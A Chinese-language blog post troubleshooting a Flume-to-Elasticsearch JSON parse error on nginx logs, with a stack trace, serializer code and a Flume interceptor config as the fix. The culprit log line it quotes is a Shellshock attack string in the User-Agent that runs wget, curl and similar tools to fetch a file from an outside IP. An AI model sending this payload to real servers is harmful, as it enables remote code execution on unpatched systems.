flume nginx 日誌處理異常 JsonParseException: Unexpected character ('(' (code 40)): expected a valid value

flume nginx 日誌處理異常 JsonParseException: Unexpected character (‘(’ (code 40)): expected a valid value

最近flume處理nginx日誌,每隔幾天就斷一次,出現JSON反序列化異常

異常堆棧:

2016/01/26 14:37:49.043 [ERROR] [] [] [SinkRunner-PollingRunner-DefaultSinkProcessor] [org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:160)]  Unable to deliver event. Exception follows.
org.apache.flume.EventDeliveryException: Failed to commit transaction. Transaction rolled back.
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:227)
    at org.apache.flume.sink.DefaultSinkProcessor.process(DefaultSinkProcessor.java:68)
    at org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:147)
    at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.common.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
 at [Source: [B@78f004c9; line: 1, column: 2]
    at org.elasticsearch.common.jackson.core.JsonParser._constructError(JsonParser.java:1487)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:518)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportUnexpectedChar(ParserMinimalBase.java:447)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._handleUnexpectedValue(UTF8StreamJsonParser.java:2485)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._nextTokenNotInObject(UTF8StreamJsonParser.java:801)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser.nextToken(UTF8StreamJsonParser.java:697)
    at org.elasticsearch.common.xcontent.json.JsonXContentParser.nextToken(JsonXContentParser.java:51)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.addComplexField(ContentBuilderUtil.java:60)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.appendField(ContentBuilderUtil.java:47)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.appendHeaders(ElasticSearchLogStashEventSerializer.java:131)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:80)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:73)
    at org.apache.flume.sink.elasticsearch.client.ElasticSearchTransportClient.addEvent(ElasticSearchTransportClient.java:164)
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:189)

查找代碼

builder.startObject("@fields");
    for (String key : headers.keySet()) {
      byte[] val = headers.get(key).getBytes(charset);
      ContentBuilderUtil.appendField(builder, key, val);
    }

原來是在序列化的時候失敗了,ContentBuilderUtil

public static void appendField(XContentBuilder builder, String field,
      byte[] data) throws IOException {
    XContentType contentType = XContentFactory.xContentType(data);
    if (contentType == null) {
      addSimpleField(builder, field, data);
    } else {
      addComplexField(builder, field, contentType, data);
    }
  }

通過 XContentFactory.xContentType(data); 判斷數據類型,從上面的異常堆棧判斷應該是獲取的是JSON類型,在看看裏面怎麼判斷JSON的,有這麼銀行代碼

// a last chance for JSON
for (int i = 0; i < length; i++) {
    if (bytes.get(i) == '{') {
        return XContentType.JSON;
    }
}

唉,怪出問題, 在找找這種處理異常的日誌內容

54.204.47.156 - - [2016-01-19T12:50:57+08:00] "GET /index.cgi HTTP/1.1" 301 184 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-" "5.000" "-" "-"

原來userAgent中的字符串中有個{,在加個替換攔截器 search_replace

agent.sources.www.type = exec 
agent.sources.www.command = tail -F -n 0 /data/nginx/logs/www.longdai.com.log
agent.sources.www.restart = true
agent.sources.www.logStdErr = true
agent.sources.www.batchSize = 200
agent.sources.www.channels = fch

agent.sources.www.interceptors = cdn sr www i1 
agent.sources.www.interceptors.www.type = static
agent.sources.www.interceptors.www.key = app
agent.sources.www.interceptors.www.value = www
agent.sources.www.interceptors.cdn.type = regex_filter
agent.sources.www.interceptors.cdn.regex = .*\\s+\\"ChinaCache\\"\\s+.*
agent.sources.www.interceptors.cdn.excludeEvents = true

agent.sources.www.interceptors.sr.type=search_replace
agent.sources.www.interceptors.sr.searchPattern=\\{
agent.sources.www.interceptors.sr.replaceString=%7b
agent.sources.www.interceptors.sr.charset=UTF-8

agent.sources.www.interceptors.i1.type = regex_extractor
agent.sources.www.interceptors.i1.regex = ([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\\"\\s+(\\d+)\\s+(\\d+)\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"
agent.sources.www.interceptors.i1.serializers = s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13
agent.sources.www.interceptors.i1.serializers.s1.name = remote_addr
agent.sources.www.interceptors.i1.serializers.s2.name = remote_user
agent.sources.www.interceptors.i1.serializers.s3.name = datetime
#agent.sourceswwwi.interceptors.i1.serializers.s3.type = org.apache.flume.interceptor.RegexExtractorInterceptorMillisSerializer
#agent.sourceswwwi.interceptors.i1.serializers.s3.name = timestamp
#agent.sourceswwwi.interceptors.i1.serializers.s3.pattern  = yyyy-MM-dd'T'HH:mm:ssZ
agent.sources.www.interceptors.i1.serializers.s4.name = http_method
agent.sources.www.interceptors.i1.serializers.s5.name = uri
agent.sources.www.interceptors.i1.serializers.s6.name = status
agent.sources.www.interceptors.i1.serializers.s7.name = body_length
agent.sources.www.interceptors.i1.serializers.s8.name = http_referer
agent.sources.www.interceptors.i1.serializers.s9.name = user_agent
agent.sources.www.interceptors.i1.serializers.s10.name = http_x_forwarded_for
agent.sources.www.interceptors.i1.serializers.s11.name = request_time
agent.sources.www.interceptors.i1.serializers.s12.name = upstream_addr
agent.sources.www.interceptors.i1.serializers.s13.name = upstream_response_time

agent.sources.www.interceptors.i2.type = timestamp
agent.sources.www.interceptors.i3.type = host
agent.sources.www.interceptors.i3.hostHeader = hostname


agent.sinks.elasticSearch.type = org.apache.flume.sink.elasticsearch.ElasticSearchSink
agent.sinks.elasticSearch.channel = fch
agent.sinks.elasticSearch.batchSize = 2000
agent.sinks.elasticSearch.hostNames = 172.16.0.18:9300
agent.sinks.elasticSearch.indexName = nginx
agent.sinks.elasticSearch.indexType = nginx
agent.sinks.elasticSearch.clusterName = longdai 
agent.sinks.elasticSearch.client = transport
agent.sinks.elasticSearch.serializer = org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer

flume處理nginx日誌的配置可以查看這裏

http://blog.csdn.net/lanmo555/article/details/50483561

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章